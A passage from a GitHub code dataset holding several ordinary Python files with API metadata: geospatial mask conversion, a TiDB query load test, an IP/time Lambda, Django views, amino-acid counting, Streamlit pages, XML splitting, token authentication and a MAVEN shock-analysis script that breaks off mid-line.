"usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 73, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 79, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 82, "usage_type": "call"}, {"api_name": "httpx.post", "line_number": 90, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 94, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 95, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 95, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 95, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 99, "usage_type": "call"}, {"api_name": "httpx.post", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 114, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 114, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 116, "usage_type": "call"}, {"api_name": "django_utils.set_session", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "django_utils.delete_session", "line_number": 122, "usage_type": "call"}, {"api_name": "django_utils.delete_session", "line_number": 123, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "74038383483", "text": "# <2021>, by ISB Institute of Data Science\n# Contributors: Dr. Shruti Mantri, Gokul S Kumar and Vishal Sriram\n# Faculty Mentors: Dr. Manish Gangwar and Dr. Madhu Vishwanathan\n# Affiliation: Indian School of Business\n\n# Importing libraries\nimport math\nfrom unicodedata import name\nimport rasterio\nimport glob\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom skimage.measure import find_contours\nfrom PIL import Image\nfrom shapely.geometry import mapping,Polygon,MultiLineString,LineString\nfrom shapely import wkt\nimport fiona\nfrom fiona.crs import from_epsg\nimport time\nimport shapely\nimport os\nfrom scipy.sparse import load_npz\nfrom tqdm import tqdm, trange\nimport multiprocessing as mp\nfrom functools import partial\nshapely.speedups.disable()\n\n# Func for converting npz to geojson\ndef npz_to_geojson(mask, city):\n #print(masks)\n z=17\n n = 2**z\n \n xtile=int(mask.split('\\\\')[-1].split('.npz')[0].split('.')[-2])\n ytile=int(mask.split('\\\\')[-1].split('.npz')[0].split('.')[-1])\n \n lon_deg = ((xtile / n)*360.0) - 180.0\n lat_rad = math.atan(math.sinh(math.pi * (1 - (2 * (ytile / n)))))\n lat_deg = lat_rad * (180.0 / math.pi)\n\n tx=rasterio.transform.from_origin(lon_deg,lat_deg,5.323955725076732e-06 ,5.323955725076732e-06)\n \n image=load_npz(mask).toarray()\n\n out=find_contours(image,0.5)\n if not out:\n pass\n else:\n \n cs=[]\n fig, ax = plt.subplots()\n for contour in out: \n cs.append(ax.plot(contour[:, 1], contour[:, 0], linewidth=2))\n \n plt.close()\n poly=[]\n for i in cs:\n \n x=i[0].get_xdata()\n y=i[0].get_ydata()\n aa=rasterio.transform.xy(tx,y,x)\n poly.append(LineString([(i[0], i[1]) for i in zip(aa[0],aa[1])]))\n \n \n list_polygons = [wkt.loads(p.wkt) for p in poly]\n \n mult=shapely.geometry.MultiLineString(list_polygons)\n \n \n \n crs = from_epsg(4326)\n \n schema = {\n 'geometry': 'MultiLineString',\n 'properties': {'id': 'int','Name':'str'},\n \n }\n \n \n \n # Write a new Shapefile\n with fiona.open('../inference/geojsons/{}/'.format(city)+mask.split('\\\\')[-1].split('.npz')[0].split('.')[0]+'.geojson', 'w', 'GeoJSON', schema,crs=crs) as c:\n ## If there are multiple geometries, put the \"for\" loop here\n #for ls in list_polygons:\n \n c.write({\n 'geometry': mapping(mult),\n 'properties': {'id': 1,'Name':'Detected Hospital'},\n })\n\nif __name__ == '__main__':\n city_list = os.listdir('../inference/infra_info/predicted/')\n with tqdm(total = len(city_list), desc = 'No. of cities') as pbar1:\n for fname in city_list:\n # Parallelizing by spawning multiple processes\n with mp.Pool(mp.cpu_count() - 11) as pool:\n city_name = os.path.splitext(fname)[0]\n #print(city_name)\n masks = sorted(glob.glob('../inference/preds/{}/*'.format(city_name)), key=lambda x:float(re.findall(\"(\\d+)\",x)[0]))\n if not os.path.exists('../inference/geojsons/{}'.format(city_name)):\n os.makedirs('../inference/geojsons/{}'.format(city_name))\n with tqdm(total = len(masks), desc = '{} progress'.format(city_name)) as pbar2:\n temp = partial(npz_to_geojson, city = city_name)\n #print(masks)\n for i, _ in enumerate(pool.imap_unordered(func = temp, iterable = masks)):\n pbar2.update()\n os.rename('../inference/infra_info/predicted/{}'.format(fname), '../inference/infra_info/geojsons/{}'.format(fname))\n pbar1.update(1)\n \n# Ref: https://github.com/geospoc/rural-school-mapper", "repo_name": "Gokul-S-Kumar/Hospital_detection_from_aerial_images", "sub_path": "src/npz_to_geojsons.py", "file_name": "npz_to_geojsons.py", "file_ext": "py", "file_size_in_byte": 3906, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "shapely.speedups.disable", "line_number": 27, "usage_type": "call"}, {"api_name": "shapely.speedups", "line_number": 27, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 39, "usage_type": "call"}, {"api_name": "math.sinh", "line_number": 39, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 39, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "rasterio.transform.from_origin", "line_number": 42, "usage_type": "call"}, {"api_name": "rasterio.transform", "line_number": 42, "usage_type": "attribute"}, {"api_name": "scipy.sparse.load_npz", "line_number": 44, "usage_type": "call"}, {"api_name": "skimage.measure.find_contours", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "rasterio.transform.xy", "line_number": 62, "usage_type": "call"}, {"api_name": "rasterio.transform", "line_number": 62, "usage_type": "attribute"}, {"api_name": "shapely.geometry.LineString", "line_number": 63, "usage_type": "call"}, {"api_name": "shapely.wkt.loads", "line_number": 66, "usage_type": "call"}, {"api_name": "shapely.wkt", "line_number": 66, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiLineString", "line_number": 68, "usage_type": "call"}, {"api_name": "shapely.geometry", "line_number": 68, "usage_type": "attribute"}, {"api_name": "fiona.crs.from_epsg", "line_number": 72, "usage_type": "call"}, {"api_name": "fiona.open", "line_number": 83, "usage_type": "call"}, {"api_name": "shapely.geometry.mapping", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 94, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 97, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 100, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 103, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 104, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "9655882472", "text": "\"\"\"\n- 模拟查询tidb 集群 tidb 集群中已经创建了test database 以及user表\n- 该脚本只能在tidb同一个k8s 集群中跑,否则网络则不通\n\n\"\"\"\n\nimport time\nimport pymysql\nimport datetime\nimport os\n\n\ndef main():\n start = time.time()\n print(\"Starting connect to tidb....\")\n db = pymysql.connect(host='basic-tidb.tidb-cluster.svc.cluster.local',\n port=4000,\n user='root',\n database='test')\n print(\"Connected to tidb....\")\n cursor = db.cursor()\n now = datetime.datetime.now()\n minute = now.minute\n # 读取出先前分钟数的第一位 如 18:30分钟 则 t1 = 3\n t1 = int(str(minute)[0])\n # 计算当前分钟数第二位 然后默认 * 1000 如 18:35分 则 5 * 1000\n times = (minute % 10) * os.getenv(\"TIMES\", 1000)\n if (t1 % 2) == 0:\n # 为了让请求呈正弦分布,这里让times对称\n times = (10 - (minute % 10)) * os.getenv(\"TIMES\", 1000)\n print(\"time: \" + now.strftime(\"%Y-%m-%d %H:%M:%S\") + \" times: \", str(times))\n while times > 0:\n cursor.execute(\"SELECT * from `app_user` limit 1\")\n data = cursor.fetchall()\n times -= 1\n end = time.time()\n print(\"fetch data success,use time seconds=\" + str(end - start))\n db.close()\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "MetricsAD/tidb-qps-test", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1358, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 27, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "26358216134", "text": "import requests\nimport json\ndef lambda_handler(event, context):\n version = context.function_version\n ipaddress = requests.get('http://ip.42.pl/raw').text\n suburl = requests.get('http://worldtimeapi.org/api/ip/'+ipaddress+'.json').text\n y = json.loads(suburl)\n y['version'] = version\n print(json.dumps(y))\n \n return {\n 'statusCode': 200,\n 'body': json.dumps(y)\n }\n", "repo_name": "iamfavas/task_on_pipeline", "sub_path": "lambda_function.py", "file_name": "lambda_function.py", "file_ext": "py", "file_size_in_byte": 404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 6, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 7, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 9, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "34236655753", "text": "from django.shortcuts import render, redirect\nfrom . models import Book, Author\n\n# Create your views here.\n\ndef index(request):\n return redirect('/books')\n\ndef books(request):\n books = Book.objects.all()\n context = {\n 'books': books\n }\n return render(request, 'books.html', context)\n\ndef catalog_books(request):\n Book.objects.create(\n title = request.POST['book_title'],\n description = request.POST['book_description'],\n )\n return redirect('/books')\n\ndef display_books(request, book_id):\n correct_book = Book.objects.get(id = book_id)\n context = {\n 'book_id' : correct_book\n }\n return render(request, \"view_books.html\", context)\n\ndef authors(request):\n authors = Author.objects.all()\n context = {\n 'authors': authors\n }\n return render(request, 'authors.html', context)\n\ndef catalog_authors(request):\n Author.objects.create(\n first_name = request.POST['author_first_name'],\n last_name = request.POST['author_last_name'],\n notes = request.POST['author_notes'],\n )\n return redirect('/authors')\n", "repo_name": "JustonSmith/Coding_Dojo", "sub_path": "python_stack/learn_assignments/books_authors_env/books_authors_project/books_authors_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1104, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 7, "usage_type": "call"}, {"api_name": "models.Book.objects.all", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 10, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Book.objects.create", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Book.objects.get", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Book.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.Book", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Author.objects.all", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Author.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Author", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Author.objects.create", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Author.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Author", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "15678892004", "text": "from Bio import SeqIO\nfrom Bio.SeqUtils.ProtParam import ProteinAnalysis\n\n# functions\ndef aa_count(filename, filetype):\n res_dict = {}\n f = open(filename)\n for record in SeqIO.parse(f, filetype):\n temp_dict = ProteinAnalysis(str(record.seq)).count_amino_acids()\n for key, val in temp_dict.items():\n if key in res_dict:\n res_dict[key] = res_dict[key] + val\n else:\n res_dict[key] = val\n return res_dict\n\ndef print_results(data_name, data_dict):\n print(f\"Results for {data_name}\")\n print(f\"Most frequent AA: {max(data_dict, key=data_dict.get)}\")\n print(f\"Least frequent AA: {min(data_dict, key=data_dict.get)}\")\n print(f\"Complete AA count:\")\n for key, val in data_dict.items():\n print(key, val)\n print()\n\n# generate aa count dictionaries for refseq and swissprot files\nrefseq = aa_count('human.protein.fasta', \"fasta\")\nswissprot = aa_count('uniprot_sprot_human.dat', \"swiss\")\n\n# print statements\nprint_results(\"RefSeq Human Proteins File ('human.protein.fasta')\", refseq)\nprint_results(\"SwissProt Human Proteins File ('human.protein.fasta')\", swissprot)\n", "repo_name": "greenkidneybean/bchb524", "sub_path": "lec/12/12.1.py", "file_name": "12.1.py", "file_ext": "py", "file_size_in_byte": 1154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 8, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 8, "usage_type": "name"}, {"api_name": "Bio.SeqUtils.ProtParam.ProteinAnalysis", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "72597249724", "text": "import streamlit as st\nimport pandas as pd\nimport io\nfrom PIL import Image\nimport base64\n\nst.set_page_config(page_title=\"New Meeting\") \n\nst.title(\"New Meeting\")\n\n# file = open(\"../images/peak logo.png\", \"rb\")\n# contents = file.read()\n# img_str = base64.b64encode(contents).decode(\"utf-8\")\n# buffer = io.BytesIO()\n# file.close()\n# img_data = base64.b64decode(img_str)\n# img = Image.open(io.BytesIO(img_data))\n# resized_img = img.resize((150, 60)) # x, y\n# resized_img.save(buffer, format=\"PNG\")\n# img_b64 = base64.b64encode(buffer.getvalue()).decode(\"utf-8\")\n\nst.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\naudio , text, table = st.tabs([\"Audio\", \"Text\", \"Table\"])\n\nwith audio:\n col1, col2, col3 = st.columns([0.45, 0.10, 0.45])\n\n with col1:\n st.write(\"Record your voice:\")\n voice_start_recording_button = st.button(\"Start Recording\")\n with col3:\n st.write(\"Upload your meeting recording: \")\n uploaded_file = st.file_uploader(\" \")\n\n\nwith text:\n text_area_text = st.text_area('Write something to be added to the meeting minute table', key='text_area_text')\n text_add_button = st.button('Add', key='text_add_button')\n\nwith table:\n uploaded_file = st.file_uploader(\"Upload Excel file\", type=[\"xlsx\"])\n # excel_add_button = st.button('Add', key='excel_add_button')\n\n\n", "repo_name": "YusufEmad04/hackathon2", "sub_path": "pages/4 - New Meeting.py", "file_name": "4 - New Meeting.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "streamlit.set_page_config", "line_number": 7, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 9, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 22, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 34, "usage_type": "call"}, {"api_name": "streamlit.tabs", "line_number": 50, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 53, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 56, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 57, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 59, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.text_area", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 65, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "22695982968", "text": "import os, sys\nfrom xml.etree import ElementTree as ET\n\ndef split_file(filename):\n base_name, extension = filename.rsplit('.', 1)\n tree = ET.parse(filename)\n root = tree.getroot()\n middle_idx = len(root) // 2\n\n write_file(f'{base_name}_1.{extension}', root[:middle_idx + 1])\n write_file(f'{base_name}_2.{extension}', root[middle_idx + 1:])\n\ndef write_file(filename, elements):\n with open(filename, 'wb') as file:\n file.write(b'')\n for element in elements:\n file.write(ET.tostring(element, encoding='utf-8').strip())\n file.write(b'')\n \n validate_and_info(filename)\n\ndef validate_and_info(file_name):\n try:\n tree = ET.parse(file_name)\n print(f\"{file_name} is a valid XML file.\")\n events_count = len(tree.findall('.//event'))\n print(f\"Number of events in {file_name}: {events_count}\")\n file_size_MB = os.path.getsize(file_name) / (1024 * 1024)\n print(f\"File size of {file_name}: {file_size_MB:.2f} MB\\n\")\n except ET.ParseError:\n print(f\"{file_name} is not a valid XML file.\")\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n split_file(filename)\n", "repo_name": "krabello/XML-Splitter", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1222, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 6, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 6, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 17, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 17, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 24, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.getsize", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 30, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "34239555572", "text": "\"\"\"Authentication and authorization process.\"\"\"\nimport datetime\nimport logging\nfrom exer_user_link.adapters.repositories import TokenRepository, UserRepository\nfrom exer_user_link.domains import Token\nfrom typing import Union\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass AuthService():\n \"\"\"Auth service to generate and verify tokens.\"\"\"\n\n def __init__(self, token_repository: TokenRepository, user_repository: UserRepository):\n self._token_repository = token_repository\n self._user_repository = user_repository\n\n def authenticate(self, user_id: str, password: str) -> Union[None, Token]:\n \"\"\"Authentication function.\"\"\"\n logger.info(f'Authentication {user_id}')\n user = self._user_repository.find_by_userid(user_id)\n if not user:\n return None\n if user.password != password:\n return None\n token_value = self._generate_new_token(user_id)\n return Token(userid=user_id, value=token_value)\n\n def verify(self, token: Token) -> bool:\n \"\"\"Verificationfunction.\"\"\"\n logger.info(f'Verifying {str(token.value)}')\n restored_token = self._token_repository.find_by_value(token.value)\n if not restored_token:\n return False\n if not restored_token.userid == token.userid:\n return False\n if (datetime.datetime.now() - restored_token.current_date) >= datetime.timedelta(minutes=5):\n self._token_repository.remove(restored_token)\n return False\n restored_token.uses += 1\n # avoid magic number\n if restored_token.uses < 5:\n self._token_repository.update(restored_token)\n else:\n # correct token but removed from the db.\n self._token_repository.remove(restored_token)\n return True\n\n def _generate_new_token(self, user_id: str) -> str:\n token = Token(user_id)\n self._token_repository.save(token)\n return token.value\n", "repo_name": "carlosb1/projects-python", "sub_path": "exercises/exer-user-link/exer_user_link/services/auth_service.py", "file_name": "auth_service.py", "file_ext": "py", "file_size_in_byte": 2007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "exer_user_link.adapters.repositories.TokenRepository", "line_number": 15, "usage_type": "name"}, {"api_name": "exer_user_link.adapters.repositories.UserRepository", "line_number": 15, "usage_type": "name"}, {"api_name": "exer_user_link.domains.Token", "line_number": 28, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 19, "usage_type": "name"}, {"api_name": "exer_user_link.domains.Token", "line_number": 19, "usage_type": "name"}, {"api_name": "exer_user_link.domains.Token", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 38, "usage_type": "call"}, {"api_name": "exer_user_link.domains.Token", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "39925220375", "text": "# 0 uso modulo desde otro modulo\n# 1 uso modulo y quiero que me haga plots y los guarde\nMODO_hipotesisMHD = 0\n\n\nfrom mag import shock_date\nfrom delimitacionshock import B, t_mag\nfrom delimitacionshock import t_swia_mom, densidad_swia, temperatura_swia_norm, t_swea, flujosenergia_swea, nivelesenergia_swea\nfrom delimitacionshock import Bu, Bd, norm_Bu, norm_Bd, Vu, Vd, iu_v, fu_v, id_v, fd_v\nfrom subestructuras_calculos_2 import N\n\n\nfrom importlib import reload\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sympy.solvers import solve\nfrom sympy import Symbol\nimport scipy \nfrom scipy import optimize\n\n\n\npath_analisis = r'C:\\Users\\sofia\\Documents\\Facultad\\Tesis\\Analisis/{}/'.format(shock_date)\nif not os.path.exists(path_analisis):\n os.makedirs(path_analisis)\n\n#%%----------------------------------- FUNCIONES GENERALES -------------------------------------------\n \n#para calcular Te \ndef Te(ind_t_Te, Emin_fit, Emax_fit, amp0, mu0, sigma0, dist_e, energ, t):\n \n '''\n ind_t_Te es indice del tiempo (up/down) en el que fijo la distribucion de electrones\n Emin_fit y Emax_fit son los limites de energias en donde hago el ajuste\n gaussiano\n amp0, mu0, sigma0 son los parametros iniciales del fit\n '''\n \n \n #selecciono rango de energias donde hacer el ajuste (energias van de mayor a menor)\n ind_Emin_fit = (abs(energ - Emin_fit)).argmin()\n ind_Emax_fit = (abs(energ - Emax_fit)).argmin()\n \n \n #defino funcion gaussiana\n def gaussiana(x,a,x0,sigma):\n return a*np.exp(-(x-x0)**2/(2*sigma**2))\n \n \n #fit gaussiano de los datos\n params, cov = scipy.optimize.curve_fit(gaussiana,\n energ[ind_Emax_fit:ind_Emin_fit], dist_e[ind_t_Te,ind_Emax_fit:ind_Emin_fit], [amp0,mu0,sigma0])\n \n f_gauss = gaussiana(energ, params[0], params[1], params[2])\n \n #calculo ancho altura mitad\n aam = max(f_gauss)/2\n \n #estimo Te como energia donde se da el aam\n ind_aam = (abs(f_gauss - aam)).argmin()\n Te = energ[ind_aam]\n \n return Te, ind_aam, aam, f_gauss, params, ind_Emin_fit, ind_Emax_fit\n\n#%%#####################################################################################################\n########################################################################################################\n########################################################################################################\n########################################################################################################\n#%%\n#plot de densidad y B para ver que es un shock rapido\n\n \nif MODO_hipotesisMHD == 1:\n \n \n figsize = (30,15)\n msize = 8\n lw = 1\n font_label = 30\n font_leg = 26\n ticks_l = 6\n ticks_w = 3\n \n xarrow_B = 9.75 #*\n xarrow_rho = 9.70 #*\n xlim_B = np.array([t_mag[3020], t_mag[4244]]) #*\n xlim_rho = np.array([t_swia_mom[755], t_swia_mom[1060]]) #*\n ylim_B = 50 #*\n ylim_rho = 200 #*\n \n \n den_u = np.mean(densidad_swia[min(iu_v,fu_v):max(iu_v,fu_v)])\n den_d = np.mean(densidad_swia[min(id_v,fd_v):max(id_v,fd_v)])\n \n saltoB = norm_Bd/norm_Bu\n saltorho = den_d/den_u\n \n f2, plot1 = plt.subplots(figsize = figsize)\n f2.taight_layout = True\n \n gr1, = plot1.plot(t_mag, B, linewidth = lw, color = 'C0', label = '$B$')\n plot1.axhline(y = norm_Bu, linewidth = lw, color = 'C1')\n plot1.axhline(y = norm_Bd, linewidth = lw, color = 'C1')\n plot1.annotate('', xy=(xarrow_B, norm_Bd), xycoords='data', xytext=(xarrow_B, norm_Bu), textcoords='data', arrowprops=dict(arrowstyle='<->', connectionstyle='arc3', color='C1', lw=lw))\n plot1.text(xarrow_B-0.01, (norm_Bd + norm_Bu)/2, 'Bd:Bu = {}'.format(int(saltoB)), rotation = 90, verticalalignment='center', fontsize = font_leg, color = 'C1', bbox=dict(facecolor='white', edgecolor='None', alpha=1))\n plot1.set_xlabel('Tiempo\\n[hora decimal]', fontsize = font_label)\n plot1.set_ylabel('B\\n[nT]', fontsize = font_label)\n plt.xlim(xlim_B)\n plt.ylim(ymax = ylim_B)\n plot1.axes.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n plot1.axes.grid(axis = 'both', which = 'both', alpha = 0.8, linewidth = lw, linestyle = '--')\n \n \n plot2 = plt.twinx(plot1)\n gr2, = plot2.plot(t_swia_mom, densidad_swia, linewidth = lw, color = 'C2', label = '$n_p$')\n plot2.axhline(y = den_u, linewidth = lw, color = 'C3')\n plot2.axhline(y = den_d, linewidth = lw, color = 'C3')\n plt.annotate('', xy=(xarrow_rho, den_d), xycoords='data', xytext=(xarrow_rho, den_u), textcoords='data', arrowprops=dict(arrowstyle='<->', connectionstyle='arc3', color='C3', lw=lw))\n plt.text(xarrow_rho-0.01, (den_d + den_u)/2, 'nd:nu = {}'.format(int(saltorho)), rotation = 90, verticalalignment='center', fontsize = font_leg, color = 'C3', bbox=dict(facecolor='white', edgecolor='None', alpha=1))\n plt.xlim(xlim_rho)\n plt.ylim(ymax = ylim_rho)\n plot2.set_ylabel('$n_p$\\n[$cm^{-3}$]', fontsize = font_label)\n plot2.axes.tick_params(axis = 'y', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n \n plot1.legend(handles = [gr1,gr2], loc = 0, fontsize = font_leg)\n \n f2.savefig(path_analisis+'fast_shock_{}'.format(shock_date))\n f2.savefig(path_analisis+'fast_shock_{}.pdf'.format(shock_date))\n\n#%%\n# \n##calculo Te\n# \n##ploteo distribucion de e vs energias a t fijo para elegir parametros y region para hacer fit\n#\n#tu_Te = 9.75 #*\n#td_Te = 9.92 #*\n#\n#ind_tu_Te = (abs(t_swea - tu_Te)).argmin()\n#ind_td_Te = (abs(t_swea - td_Te)).argmin()\n#\n#\n#\n#if MODO_hipotesisMHD == 1:\n# \n# figsize = (30,15)\n# font_title = 30\n# font_label = 30\n# font_leg = 26\n# lw = 3\n# msize = 8\n# colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']\n# ticks_l = 6\n# ticks_w = 3\n# grid_alpha = 0.8\n# \n# ylim_min_u = 1e6\n# ylim_min_d = 1e6\n# \n# \n# plt.figure(11, figsize = figsize)\n# \n# plt.subplot(121)\n# plt.title(r' Upstream - t = {} hora decimal'.format(round(t_swea[ind_tu_Te],3)), fontsize = font_title)\n# plt.plot(nivelesenergia_swea, flujosenergia_swea[ind_tu_Te,:], linewidth = lw, marker = 'o', markersize = msize, color = colors[0])\n# plt.yscale('log')\n# plt.xscale('log')\n# plt.ylabel(r'Distribución de electrones', fontsize = font_label)\n# plt.xlabel('Energía [eV]', fontsize = font_label)\n# plt.ylim(ymin = ylim_min_u)\n# plt.tick_params(axis = 'both', which = 'both', length = ticks_l, width = ticks_w, labelsize = font_label)\n# plt.grid(which = 'major', axis = 'both', linewidth = lw, linestyle = '--', alpha = 